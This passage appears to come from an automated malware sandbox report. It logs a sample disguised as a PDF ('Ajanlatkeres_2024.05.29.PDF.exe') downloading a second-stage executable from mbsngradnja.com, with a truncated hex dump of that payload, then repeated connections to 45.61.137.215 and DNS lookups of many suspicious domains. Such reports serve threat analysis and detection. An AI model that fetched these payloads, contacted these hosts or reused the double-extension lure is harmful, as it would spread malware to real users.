                                            May 29, 2024 15:45:56.038830996 CEST4980280192.168.2.945.61.137.215
                                            May 29, 2024 15:45:56.038856030 CEST4980280192.168.2.945.61.137.215
                                            May 29, 2024 15:45:56.038892031 CEST4980280192.168.2.945.61.137.215
                                            May 29, 2024 15:45:56.177995920 CEST4980380192.168.2.945.61.137.215
                                            May 29, 2024 15:45:56.183012962 CEST804980345.61.137.215192.168.2.9
                                            May 29, 2024 15:45:56.183079004 CEST4980380192.168.2.945.61.137.215
                                            May 29, 2024 15:45:56.184812069 CEST4980380192.168.2.945.61.137.215
                                            May 29, 2024 15:45:56.189728975 CEST804980345.61.137.215192.168.2.9
                                            May 29, 2024 15:45:56.189771891 CEST4980380192.168.2.945.61.137.215
                                            May 29, 2024 15:45:56.194690943 CEST804980345.61.137.215192.168.2.9
                                            May 29, 2024 15:45:58.882968903 CEST804980345.61.137.215192.168.2.9
                                            May 29, 2024 15:45:58.883028030 CEST804980345.61.137.215192.168.2.9
                                            May 29, 2024 15:45:58.883081913 CEST804980345.61.137.215192.168.2.9
                                            May 29, 2024 15:45:58.883115053 CEST804980345.61.137.215192.168.2.9
                                            May 29, 2024 15:45:58.883136988 CEST4980380192.168.2.945.61.137.215
                                            May 29, 2024 15:45:58.883152962 CEST804980345.61.137.215192.168.2.9
                                            May 29, 2024 15:45:58.883187056 CEST804980345.61.137.215192.168.2.9
                                            May 29, 2024 15:45:58.883217096 CEST4980380192.168.2.945.61.137.215
                                            May 29, 2024 15:45:58.883222103 CEST804980345.61.137.215192.168.2.9
                                            May 29, 2024 15:45:58.883253098 CEST4980380192.168.2.945.61.137.215
                                            May 29, 2024 15:45:58.883253098 CEST804980345.61.137.215192.168.2.9
                                            May 29, 2024 15:45:58.883285999 CEST804980345.61.137.215192.168.2.9
                                            May 29, 2024 15:45:58.883322001 CEST804980345.61.137.215192.168.2.9
                                            May 29, 2024 15:45:58.883353949 CEST4980380192.168.2.945.61.137.215
                                            May 29, 2024 15:45:58.883374929 CEST4980380192.168.2.945.61.137.215
                                            May 29, 2024 15:45:58.883451939 CEST4980380192.168.2.945.61.137.215
                                            May 29, 2024 15:45:58.888422012 CEST804980345.61.137.215192.168.2.9
                                            May 29, 2024 15:45:58.888456106 CEST804980345.61.137.215192.168.2.9
                                            May 29, 2024 15:45:58.888500929 CEST4980380192.168.2.945.61.137.215
                                            May 29, 2024 15:45:58.888520002 CEST804980345.61.137.215192.168.2.9
                                            May 29, 2024 15:45:58.888556957 CEST4980380192.168.2.945.61.137.215
                                            May 29, 2024 15:45:58.888597012 CEST4980380192.168.2.945.61.137.215
                                            May 29, 2024 15:45:59.090795994 CEST4980480192.168.2.945.61.137.215
                                            May 29, 2024 15:45:59.098851919 CEST804980445.61.137.215192.168.2.9
                                            May 29, 2024 15:45:59.099006891 CEST4980480192.168.2.945.61.137.215
                                            May 29, 2024 15:45:59.101278067 CEST4980480192.168.2.945.61.137.215
                                            May 29, 2024 15:45:59.106483936 CEST804980445.61.137.215192.168.2.9
                                            May 29, 2024 15:45:59.106617928 CEST4980480192.168.2.945.61.137.215
                                            May 29, 2024 15:45:59.111861944 CEST804980445.61.137.215192.168.2.9
                                            May 29, 2024 15:46:01.576543093 CEST804980445.61.137.215192.168.2.9
                                            May 29, 2024 15:46:01.576561928 CEST804980445.61.137.215192.168.2.9
                                            May 29, 2024 15:46:01.576574087 CEST804980445.61.137.215192.168.2.9
                                            May 29, 2024 15:46:01.576591015 CEST804980445.61.137.215192.168.2.9
                                            May 29, 2024 15:46:01.576601982 CEST804980445.61.137.215192.168.2.9
                                            May 29, 2024 15:46:01.576613903 CEST804980445.61.137.215192.168.2.9
                                            May 29, 2024 15:46:01.576615095 CEST4980480192.168.2.945.61.137.215
                                            May 29, 2024 15:46:01.576626062 CEST804980445.61.137.215192.168.2.9
                                            May 29, 2024 15:46:01.576692104 CEST4980480192.168.2.945.61.137.215
                                            May 29, 2024 15:46:01.576693058 CEST4980480192.168.2.945.61.137.215
                                            May 29, 2024 15:46:01.576725006 CEST4980480192.168.2.945.61.137.215
                                            May 29, 2024 15:46:01.577065945 CEST804980445.61.137.215192.168.2.9
                                            May 29, 2024 15:46:01.577078104 CEST804980445.61.137.215192.168.2.9
                                            May 29, 2024 15:46:01.577090025 CEST804980445.61.137.215192.168.2.9
                                            May 29, 2024 15:46:01.577111959 CEST4980480192.168.2.945.61.137.215
                                            May 29, 2024 15:46:01.577162027 CEST4980480192.168.2.945.61.137.215
                                            May 29, 2024 15:46:01.585486889 CEST804980445.61.137.215192.168.2.9
                                            May 29, 2024 15:46:01.585520029 CEST804980445.61.137.215192.168.2.9
                                            May 29, 2024 15:46:01.585531950 CEST4980480192.168.2.945.61.137.215
                                            May 29, 2024 15:46:01.585572958 CEST4980480192.168.2.945.61.137.215
                                            May 29, 2024 15:46:01.725923061 CEST4980580192.168.2.945.61.137.215
                                            May 29, 2024 15:46:01.731091976 CEST804980545.61.137.215192.168.2.9
                                            May 29, 2024 15:46:01.731168032 CEST4980580192.168.2.945.61.137.215
                                            May 29, 2024 15:46:01.734415054 CEST4980580192.168.2.945.61.137.215
                                            May 29, 2024 15:46:01.739553928 CEST804980545.61.137.215192.168.2.9
                                            May 29, 2024 15:46:01.739599943 CEST4980580192.168.2.945.61.137.215
                                            May 29, 2024 15:46:01.744549990 CEST804980545.61.137.215192.168.2.9
                                            May 29, 2024 15:46:04.480976105 CEST804980545.61.137.215192.168.2.9
                                            May 29, 2024 15:46:04.481019974 CEST804980545.61.137.215192.168.2.9
                                            May 29, 2024 15:46:04.481059074 CEST804980545.61.137.215192.168.2.9
                                            May 29, 2024 15:46:04.481091022 CEST804980545.61.137.215192.168.2.9
                                            May 29, 2024 15:46:04.481096029 CEST4980580192.168.2.945.61.137.215
                                            May 29, 2024 15:46:04.481126070 CEST804980545.61.137.215192.168.2.9
                                            May 29, 2024 15:46:04.481154919 CEST4980580192.168.2.945.61.137.215
                                            May 29, 2024 15:46:04.481158018 CEST804980545.61.137.215192.168.2.9
                                            May 29, 2024 15:46:04.481193066 CEST804980545.61.137.215192.168.2.9
                                            May 29, 2024 15:46:04.481221914 CEST804980545.61.137.215192.168.2.9
                                            May 29, 2024 15:46:04.481255054 CEST804980545.61.137.215192.168.2.9
                                            May 29, 2024 15:46:04.481256962 CEST4980580192.168.2.945.61.137.215
                                            May 29, 2024 15:46:04.481287956 CEST4980580192.168.2.945.61.137.215
                                            May 29, 2024 15:46:04.481290102 CEST804980545.61.137.215192.168.2.9
                                            May 29, 2024 15:46:04.481312990 CEST4980580192.168.2.945.61.137.215
                                            May 29, 2024 15:46:04.481312990 CEST4980580192.168.2.945.61.137.215
                                            May 29, 2024 15:46:04.481323957 CEST804980545.61.137.215192.168.2.9
                                            May 29, 2024 15:46:04.481350899 CEST4980580192.168.2.945.61.137.215
                                            May 29, 2024 15:46:04.481431007 CEST4980580192.168.2.945.61.137.215
                                            May 29, 2024 15:46:04.486287117 CEST804980545.61.137.215192.168.2.9
                                            May 29, 2024 15:46:04.486349106 CEST804980545.61.137.215192.168.2.9
                                            May 29, 2024 15:46:04.486383915 CEST4980580192.168.2.945.61.137.215
                                            May 29, 2024 15:46:04.486383915 CEST804980545.61.137.215192.168.2.9
                                            May 29, 2024 15:46:04.486418962 CEST4980580192.168.2.945.61.137.215
                                            May 29, 2024 15:46:04.486481905 CEST4980580192.168.2.945.61.137.215
                                            May 29, 2024 15:46:04.486613989 CEST804980545.61.137.215192.168.2.9
                                            May 29, 2024 15:46:04.486670017 CEST804980545.61.137.215192.168.2.9
                                            May 29, 2024 15:46:04.486701012 CEST4980580192.168.2.945.61.137.215
                                            May 29, 2024 15:46:04.486702919 CEST804980545.61.137.215192.168.2.9
                                            May 29, 2024 15:46:04.486731052 CEST4980580192.168.2.945.61.137.215
                                            May 29, 2024 15:46:04.486737013 CEST804980545.61.137.215192.168.2.9
                                            May 29, 2024 15:46:04.486762047 CEST4980580192.168.2.945.61.137.215
                                            May 29, 2024 15:46:04.486773968 CEST804980545.61.137.215192.168.2.9
                                            May 29, 2024 15:46:04.486807108 CEST4980580192.168.2.945.61.137.215
                                            May 29, 2024 15:46:04.486884117 CEST4980580192.168.2.945.61.137.215
                                            May 29, 2024 15:46:04.634577990 CEST4980680192.168.2.945.61.137.215
                                            May 29, 2024 15:46:04.640624046 CEST804980645.61.137.215192.168.2.9
                                            May 29, 2024 15:46:04.640717030 CEST4980680192.168.2.945.61.137.215
                                            May 29, 2024 15:46:04.642667055 CEST4980680192.168.2.945.61.137.215
                                            May 29, 2024 15:46:04.647650957 CEST804980645.61.137.215192.168.2.9
                                            May 29, 2024 15:46:04.647743940 CEST4980680192.168.2.945.61.137.215
                                            May 29, 2024 15:46:04.652781010 CEST804980645.61.137.215192.168.2.9
                                            May 29, 2024 15:46:07.301341057 CEST804980645.61.137.215192.168.2.9
                                            May 29, 2024 15:46:07.301405907 CEST804980645.61.137.215192.168.2.9
                                            May 29, 2024 15:46:07.301441908 CEST804980645.61.137.215192.168.2.9
                                            May 29, 2024 15:46:07.301475048 CEST804980645.61.137.215192.168.2.9
                                            May 29, 2024 15:46:07.301481009 CEST4980680192.168.2.945.61.137.215
                                            May 29, 2024 15:46:07.301511049 CEST804980645.61.137.215192.168.2.9
                                            May 29, 2024 15:46:07.301537991 CEST4980680192.168.2.945.61.137.215
                                            May 29, 2024 15:46:07.301541090 CEST804980645.61.137.215192.168.2.9
                                            May 29, 2024 15:46:07.301569939 CEST4980680192.168.2.945.61.137.215
                                            May 29, 2024 15:46:07.301569939 CEST4980680192.168.2.945.61.137.215
                                            May 29, 2024 15:46:07.301575899 CEST804980645.61.137.215192.168.2.9
                                            May 29, 2024 15:46:07.301603079 CEST4980680192.168.2.945.61.137.215
                                            May 29, 2024 15:46:07.301609993 CEST804980645.61.137.215192.168.2.9
                                            May 29, 2024 15:46:07.301636934 CEST4980680192.168.2.945.61.137.215
                                            May 29, 2024 15:46:07.301645041 CEST804980645.61.137.215192.168.2.9
                                            May 29, 2024 15:46:07.301678896 CEST804980645.61.137.215192.168.2.9
                                            May 29, 2024 15:46:07.301697969 CEST4980680192.168.2.945.61.137.215
                                            May 29, 2024 15:46:07.301697969 CEST4980680192.168.2.945.61.137.215
                                            May 29, 2024 15:46:07.301711082 CEST804980645.61.137.215192.168.2.9
                                            May 29, 2024 15:46:07.301738024 CEST4980680192.168.2.945.61.137.215
                                            May 29, 2024 15:46:07.301738024 CEST4980680192.168.2.945.61.137.215
                                            May 29, 2024 15:46:07.306622028 CEST804980645.61.137.215192.168.2.9
                                            May 29, 2024 15:46:07.306687117 CEST804980645.61.137.215192.168.2.9
                                            May 29, 2024 15:46:07.306708097 CEST4980680192.168.2.945.61.137.215
                                            May 29, 2024 15:46:07.306720018 CEST804980645.61.137.215192.168.2.9
                                            May 29, 2024 15:46:07.306725025 CEST4980680192.168.2.945.61.137.215
                                            May 29, 2024 15:46:07.306757927 CEST4980680192.168.2.945.61.137.215
                                            May 29, 2024 15:46:07.446026087 CEST4980780192.168.2.945.61.137.215
                                            May 29, 2024 15:46:07.451297998 CEST804980745.61.137.215192.168.2.9
                                            May 29, 2024 15:46:07.451369047 CEST4980780192.168.2.945.61.137.215
                                            May 29, 2024 15:46:07.455147982 CEST4980780192.168.2.945.61.137.215
                                            May 29, 2024 15:46:07.460046053 CEST804980745.61.137.215192.168.2.9
                                            May 29, 2024 15:46:07.460093975 CEST4980780192.168.2.945.61.137.215
                                            May 29, 2024 15:46:07.465147018 CEST804980745.61.137.215192.168.2.9
                                            May 29, 2024 15:46:09.901803017 CEST804980745.61.137.215192.168.2.9
                                            May 29, 2024 15:46:09.901832104 CEST804980745.61.137.215192.168.2.9
                                            May 29, 2024 15:46:09.901854992 CEST804980745.61.137.215192.168.2.9
                                            May 29, 2024 15:46:09.901868105 CEST804980745.61.137.215192.168.2.9
                                            May 29, 2024 15:46:09.901874065 CEST4980780192.168.2.945.61.137.215
                                            May 29, 2024 15:46:09.901905060 CEST4980780192.168.2.945.61.137.215
                                            May 29, 2024 15:46:09.901983023 CEST804980745.61.137.215192.168.2.9
                                            May 29, 2024 15:46:09.902007103 CEST4980780192.168.2.945.61.137.215
                                            May 29, 2024 15:46:09.902029037 CEST4980780192.168.2.945.61.137.215
                                            May 29, 2024 15:46:09.902167082 CEST804980745.61.137.215192.168.2.9
                                            May 29, 2024 15:46:09.902201891 CEST4980780192.168.2.945.61.137.215
                                            May 29, 2024 15:46:09.902239084 CEST804980745.61.137.215192.168.2.9
                                            May 29, 2024 15:46:09.902251959 CEST804980745.61.137.215192.168.2.9
                                            May 29, 2024 15:46:09.902271032 CEST4980780192.168.2.945.61.137.215
                                            May 29, 2024 15:46:09.902282953 CEST804980745.61.137.215192.168.2.9
                                            May 29, 2024 15:46:09.902290106 CEST4980780192.168.2.945.61.137.215
                                            May 29, 2024 15:46:09.902307987 CEST804980745.61.137.215192.168.2.9
                                            May 29, 2024 15:46:09.902326107 CEST4980780192.168.2.945.61.137.215
                                            May 29, 2024 15:46:09.902359009 CEST4980780192.168.2.945.61.137.215
                                            May 29, 2024 15:46:09.907282114 CEST804980745.61.137.215192.168.2.9
                                            May 29, 2024 15:46:09.907299042 CEST804980745.61.137.215192.168.2.9
                                            May 29, 2024 15:46:09.907310963 CEST804980745.61.137.215192.168.2.9
                                            May 29, 2024 15:46:09.907322884 CEST4980780192.168.2.945.61.137.215
                                            May 29, 2024 15:46:09.907345057 CEST4980780192.168.2.945.61.137.215
                                            May 29, 2024 15:46:09.908574104 CEST4980780192.168.2.945.61.137.215
                                            May 29, 2024 15:46:10.051084042 CEST4980880192.168.2.945.61.137.215
                                            May 29, 2024 15:46:10.056139946 CEST804980845.61.137.215192.168.2.9
                                            May 29, 2024 15:46:10.056391001 CEST4980880192.168.2.945.61.137.215
                                            May 29, 2024 15:46:10.058300018 CEST4980880192.168.2.945.61.137.215
                                            May 29, 2024 15:46:10.063219070 CEST804980845.61.137.215192.168.2.9
                                            May 29, 2024 15:46:10.063270092 CEST4980880192.168.2.945.61.137.215
                                            May 29, 2024 15:46:10.068188906 CEST804980845.61.137.215192.168.2.9
                                            May 29, 2024 15:46:12.658502102 CEST804980845.61.137.215192.168.2.9
                                            May 29, 2024 15:46:12.658530951 CEST804980845.61.137.215192.168.2.9
                                            May 29, 2024 15:46:12.658566952 CEST804980845.61.137.215192.168.2.9
                                            May 29, 2024 15:46:12.658577919 CEST804980845.61.137.215192.168.2.9
                                            May 29, 2024 15:46:12.658580065 CEST4980880192.168.2.945.61.137.215
                                            May 29, 2024 15:46:12.658587933 CEST804980845.61.137.215192.168.2.9
                                            May 29, 2024 15:46:12.658607006 CEST804980845.61.137.215192.168.2.9
                                            May 29, 2024 15:46:12.658610106 CEST4980880192.168.2.945.61.137.215
                                            May 29, 2024 15:46:12.658620119 CEST804980845.61.137.215192.168.2.9
                                            May 29, 2024 15:46:12.658632994 CEST804980845.61.137.215192.168.2.9
                                            May 29, 2024 15:46:12.658652067 CEST4980880192.168.2.945.61.137.215
                                            May 29, 2024 15:46:12.658659935 CEST4980880192.168.2.945.61.137.215
                                            May 29, 2024 15:46:12.658687115 CEST4980880192.168.2.945.61.137.215
                                            May 29, 2024 15:46:12.658720016 CEST804980845.61.137.215192.168.2.9
                                            May 29, 2024 15:46:12.658740997 CEST804980845.61.137.215192.168.2.9
                                            May 29, 2024 15:46:12.658756971 CEST4980880192.168.2.945.61.137.215
                                            May 29, 2024 15:46:12.658773899 CEST4980880192.168.2.945.61.137.215
                                            May 29, 2024 15:46:12.663669109 CEST804980845.61.137.215192.168.2.9
                                            May 29, 2024 15:46:12.663705111 CEST804980845.61.137.215192.168.2.9
                                            May 29, 2024 15:46:12.663713932 CEST4980880192.168.2.945.61.137.215
                                            May 29, 2024 15:46:12.663742065 CEST804980845.61.137.215192.168.2.9
                                            May 29, 2024 15:46:12.663752079 CEST4980880192.168.2.945.61.137.215
                                            May 29, 2024 15:46:12.663780928 CEST4980880192.168.2.945.61.137.215
                                            TimestampSource PortDest PortSource IPDest IP
                                            May 29, 2024 15:42:06.728523016 CEST5468853192.168.2.91.1.1.1
                                            May 29, 2024 15:42:07.010850906 CEST53546881.1.1.1192.168.2.9
                                            May 29, 2024 15:42:46.233161926 CEST5442453192.168.2.91.1.1.1
                                            May 29, 2024 15:42:46.501764059 CEST53544241.1.1.1192.168.2.9
                                            May 29, 2024 15:43:07.201517105 CEST5100753192.168.2.91.1.1.1
                                            May 29, 2024 15:43:07.232691050 CEST53510071.1.1.1192.168.2.9
                                            May 29, 2024 15:43:26.701582909 CEST4954553192.168.2.91.1.1.1
                                            May 29, 2024 15:43:27.013153076 CEST53495451.1.1.1192.168.2.9
                                            May 29, 2024 15:43:46.904958963 CEST5778553192.168.2.91.1.1.1
                                            May 29, 2024 15:43:46.918183088 CEST53577851.1.1.1192.168.2.9
                                            May 29, 2024 15:44:07.365470886 CEST5246153192.168.2.91.1.1.1
                                            May 29, 2024 15:44:07.391618967 CEST53524611.1.1.1192.168.2.9
                                            May 29, 2024 15:44:27.850119114 CEST4942753192.168.2.91.1.1.1
                                            May 29, 2024 15:44:27.865917921 CEST53494271.1.1.1192.168.2.9
                                            May 29, 2024 15:44:48.421008110 CEST5170253192.168.2.91.1.1.1
                                            May 29, 2024 15:44:48.463354111 CEST53517021.1.1.1192.168.2.9
                                            May 29, 2024 15:45:09.170502901 CEST5870353192.168.2.91.1.1.1
                                            May 29, 2024 15:45:09.204763889 CEST53587031.1.1.1192.168.2.9
                                            May 29, 2024 15:45:29.716234922 CEST5028653192.168.2.91.1.1.1
                                            May 29, 2024 15:45:30.702610016 CEST5028653192.168.2.91.1.1.1
                                            May 29, 2024 15:45:30.833817005 CEST53502861.1.1.1192.168.2.9
                                            May 29, 2024 15:45:30.833842993 CEST53502861.1.1.1192.168.2.9
                                            May 29, 2024 15:45:50.186135054 CEST5164653192.168.2.91.1.1.1
                                            May 29, 2024 15:45:50.243818998 CEST53516461.1.1.1192.168.2.9
                                            May 29, 2024 15:46:32.795833111 CEST4920653192.168.2.91.1.1.1
                                            May 29, 2024 15:46:32.814187050 CEST53492061.1.1.1192.168.2.9
                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            May 29, 2024 15:42:06.728523016 CEST192.168.2.91.1.1.10xbd00Standard query (0)mbsngradnja.comA (IP address)IN (0x0001)false
                                            May 29, 2024 15:42:46.233161926 CEST192.168.2.91.1.1.10xdb8dStandard query (0)www.imdcaam.comA (IP address)IN (0x0001)false
                                            May 29, 2024 15:43:07.201517105 CEST192.168.2.91.1.1.10x160cStandard query (0)www.lovedacademy.comA (IP address)IN (0x0001)false
                                            May 29, 2024 15:43:26.701582909 CEST192.168.2.91.1.1.10xa036Standard query (0)www.vivaness.clubA (IP address)IN (0x0001)false
                                            May 29, 2024 15:43:46.904958963 CEST192.168.2.91.1.1.10x5bd1Standard query (0)www.w937xb.comA (IP address)IN (0x0001)false
                                            May 29, 2024 15:44:07.365470886 CEST192.168.2.91.1.1.10x753eStandard query (0)www.servicepmgtl.worldA (IP address)IN (0x0001)false
                                            May 29, 2024 15:44:27.850119114 CEST192.168.2.91.1.1.10x8417Standard query (0)www.sukhiclothing.comA (IP address)IN (0x0001)false
                                            May 29, 2024 15:44:48.421008110 CEST192.168.2.91.1.1.10xf629Standard query (0)www.banditsolana.comA (IP address)IN (0x0001)false
                                            May 29, 2024 15:45:09.170502901 CEST192.168.2.91.1.1.10x6e1fStandard query (0)www.mcapitalparticipacoes.comA (IP address)IN (0x0001)false
                                            May 29, 2024 15:45:29.716234922 CEST192.168.2.91.1.1.10x7c0cStandard query (0)www.top-dao.comA (IP address)IN (0x0001)false
                                            May 29, 2024 15:45:30.702610016 CEST192.168.2.91.1.1.10x7c0cStandard query (0)www.top-dao.comA (IP address)IN (0x0001)false
                                            May 29, 2024 15:45:50.186135054 CEST192.168.2.91.1.1.10x7a2eStandard query (0)www.jasonnutter.golfA (IP address)IN (0x0001)false
                                            May 29, 2024 15:46:32.795833111 CEST192.168.2.91.1.1.10x1499Standard query (0)www.cataclysmicgamingapparel.comA (IP address)IN (0x0001)false
                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            May 29, 2024 15:42:07.010850906 CEST1.1.1.1192.168.2.90xbd00No error (0)mbsngradnja.com77.105.36.123A (IP address)IN (0x0001)false
                                            May 29, 2024 15:42:46.501764059 CEST1.1.1.1192.168.2.90xdb8dNo error (0)www.imdcaam.com216.40.34.41A (IP address)IN (0x0001)false
                                            May 29, 2024 15:43:07.232691050 CEST1.1.1.1192.168.2.90x160cName error (3)www.lovedacademy.comnonenoneA (IP address)IN (0x0001)false
                                            May 29, 2024 15:43:27.013153076 CEST1.1.1.1192.168.2.90xa036No error (0)www.vivaness.club103.224.212.213A (IP address)IN (0x0001)false
                                            May 29, 2024 15:43:46.918183088 CEST1.1.1.1192.168.2.90x5bd1Name error (3)www.w937xb.comnonenoneA (IP address)IN (0x0001)false
                                            May 29, 2024 15:44:07.391618967 CEST1.1.1.1192.168.2.90x753eNo error (0)www.servicepmgtl.world104.21.10.127A (IP address)IN (0x0001)false
                                            May 29, 2024 15:44:07.391618967 CEST1.1.1.1192.168.2.90x753eNo error (0)www.servicepmgtl.world172.67.190.40A (IP address)IN (0x0001)false
                                            May 29, 2024 15:44:27.865917921 CEST1.1.1.1192.168.2.90x8417No error (0)www.sukhiclothing.comsukhiclothing.comCNAME (Canonical name)IN (0x0001)false
                                            May 29, 2024 15:44:27.865917921 CEST1.1.1.1192.168.2.90x8417No error (0)sukhiclothing.com3.33.130.190A (IP address)IN (0x0001)false
                                            May 29, 2024 15:44:27.865917921 CEST1.1.1.1192.168.2.90x8417No error (0)sukhiclothing.com15.197.148.33A (IP address)IN (0x0001)false
                                            May 29, 2024 15:44:48.463354111 CEST1.1.1.1192.168.2.90xf629No error (0)www.banditsolana.com34.132.146.171A (IP address)IN (0x0001)false
                                            May 29, 2024 15:45:09.204763889 CEST1.1.1.1192.168.2.90x6e1fName error (3)www.mcapitalparticipacoes.comnonenoneA (IP address)IN (0x0001)false
                                            May 29, 2024 15:45:30.833817005 CEST1.1.1.1192.168.2.90x7c0cNo error (0)www.top-dao.comtop-dao.com.lo1069.faipod.comCNAME (Canonical name)IN (0x0001)false
                                            May 29, 2024 15:45:30.833817005 CEST1.1.1.1192.168.2.90x7c0cNo error (0)top-dao.com.lo1069.faipod.com101.36.116.238A (IP address)IN (0x0001)false
                                            May 29, 2024 15:45:30.833842993 CEST1.1.1.1192.168.2.90x7c0cNo error (0)www.top-dao.comtop-dao.com.lo1069.faipod.comCNAME (Canonical name)IN (0x0001)false
                                            May 29, 2024 15:45:30.833842993 CEST1.1.1.1192.168.2.90x7c0cNo error (0)top-dao.com.lo1069.faipod.com101.36.116.238A (IP address)IN (0x0001)false
                                            May 29, 2024 15:45:50.243818998 CEST1.1.1.1192.168.2.90x7a2eNo error (0)www.jasonnutter.golfparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                            May 29, 2024 15:45:50.243818998 CEST1.1.1.1192.168.2.90x7a2eNo error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                            May 29, 2024 15:46:32.814187050 CEST1.1.1.1192.168.2.90x1499Name error (3)www.cataclysmicgamingapparel.comnonenoneA (IP address)IN (0x0001)false
                                            • mbsngradnja.com
                                            • 45.61.137.215
                                            • www.imdcaam.com
                                            • www.vivaness.club
                                            • www.servicepmgtl.world
                                            • www.sukhiclothing.com
                                            • www.banditsolana.com
                                            • www.top-dao.com
                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.94970977.105.36.123802820C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:42:07.047645092 CEST84OUTGET /YLc7afPlL4RjCeK.exe HTTP/1.1
                                            Host: mbsngradnja.com
                                            Connection: Keep-Alive
                                            May 29, 2024 15:42:07.742849112 CEST1236INHTTP/1.1 200 OK
                                            Date: Wed, 29 May 2024 13:42:07 GMT
                                            Server: Apache
                                            Upgrade: h2,h2c
                                            Connection: Upgrade, Keep-Alive
                                            Last-Modified: Wed, 29 May 2024 07:28:27 GMT
                                            Accept-Ranges: bytes
                                            Content-Length: 616448
                                            Keep-Alive: timeout=5, max=100
                                            Content-Type: application/x-msdownload
                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 df d7 56 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 50 09 00 00 16 00 00 00 00 00 00 1a 6e 09 00 00 20 00 00 00 80 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 09 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c8 6d 09 00 4f 00 00 00 00 80 09 00 dc 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 09 00 0c 00 00 00 98 4f 09 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELVf0Pn @ @mOOT H.text N P `.rsrcR@@.relocf@BmHTP&0h~(rp}rp}*{*"}*{*"}*0Q}}rp}rp}s}s}}( (**0{o!{o"o#o$+o% ,+Xo&-,"{o{rpo++{o'o{Xo(o*0
                                            May 29, 2024 15:42:07.742865086 CEST224INData Raw: 00 00 02 00 00 11 00 02 7b 0c 00 00 04 6f 21 00 00 0a 0a 02 7b 0c 00 00 04 6f 22 00 00 0a 06 6f 23 00 00 0a 6f 24 00 00 0a 0b 02 7b 08 00 00 04 6f 15 00 00 06 07 6f 29 00 00 0a 74 1a 00 00 01 0c 02 02 7b 0f 00 00 04 6f 2a 00 00 0a 13 05 12 05 28
                                            Data Ascii: {o!{o"o#o${oo)t{o*(+#X}{o*(+#X}(,o-,(,o.s/ o0 Xo19{s2o3rp(4o
                                            May 29, 2024 15:42:07.743079901 CEST1236INData Raw: 35 00 00 0a 00 11 04 17 6f 36 00 00 0a 00 11 04 1f 0b 6f 37 00 00 0a 00 02 28 2c 00 00 0a 11 04 6f 38 00 00 0a 00 00 08 6f 39 00 00 0a 13 07 38 e4 00 00 00 11 07 6f 3a 00 00 0a a5 1e 00 00 01 13 08 00 73 3b 00 00 0a 13 09 11 09 1f 1e 6f 30 00 00
                                            Data Ascii: 5o6o7(,o8o98o:s;o0 o1:{s2o3{X}._(<o=(>o?o@rp(A%-&+o$(4o5(AtXoBsC
                                            May 29, 2024 15:42:07.743091106 CEST224INData Raw: 73 5a 00 00 0a 6f 5b 00 00 0a 00 02 7b 11 00 00 04 28 5c 00 00 0a 6f 3f 00 00 0a 00 02 7b 11 00 00 04 20 26 01 00 00 1f 1c 73 32 00 00 0a 6f 33 00 00 0a 00 02 7b 11 00 00 04 72 d9 00 00 70 6f 35 00 00 0a 00 02 7b 11 00 00 04 20 b6 01 00 00 1f 20
                                            Data Ascii: sZo[{(\o?{ &s2o3{rpo5{ sUoV{o7{rpoB{ o]{(^o={rp"AsZo[{(\o?{ z s2o3
                                            May 29, 2024 15:42:07.743104935 CEST1236INData Raw: 00 00 0a 00 02 7b 12 00 00 04 72 31 01 00 70 6f 35 00 00 0a 00 02 7b 12 00 00 04 1f 62 1f 27 73 55 00 00 0a 6f 56 00 00 0a 00 02 7b 12 00 00 04 1f 0a 6f 37 00 00 0a 00 02 7b 12 00 00 04 72 47 01 00 70 6f 42 00 00 0a 00 02 7b 12 00 00 04 16 6f 5f
                                            Data Ascii: {r1po5{b'sUoV{o7{rGpoB{o_{sCoD{oX{(Yo={rp"@AsZo[{(^o?{ ms2o3{rWpo5{hsUo
                                            May 29, 2024 15:42:07.743156910 CEST1236INData Raw: 6f 38 00 00 0a 00 02 28 2c 00 00 0a 02 7b 0b 00 00 04 6f 38 00 00 0a 00 02 28 2c 00 00 0a 02 7b 0a 00 00 04 6f 38 00 00 0a 00 02 16 1f 32 73 32 00 00 0a 28 69 00 00 0a 00 02 72 11 02 00 70 28 35 00 00 0a 00 02 72 d9 01 00 70 6f 42 00 00 0a 00 02
                                            Data Ascii: o8(,{o8(,{o82s2(irp(5rpoBsC(j{ok{ol(k(l*0Ws}X}sm}sm}(rp}rp}rp}*
                                            May 29, 2024 15:42:07.743170023 CEST1236INData Raw: 0a 00 2a 00 00 00 1b 30 02 00 34 00 00 00 07 00 00 11 00 00 02 7b 1b 00 00 04 28 87 00 00 0a 16 fe 01 0a 06 2c 0e 00 02 7b 1b 00 00 04 28 88 00 00 0a 26 00 00 de 0e 0b 00 07 6f 89 00 00 0a 73 8a 00 00 0a 7a 2a 01 10 00 00 00 00 01 00 24 25 00 0e
                                            Data Ascii: *04{(,{(&osz*$%%0rpX%rp%(((%rp%(((%rp%(((%rp(I+*rp}r
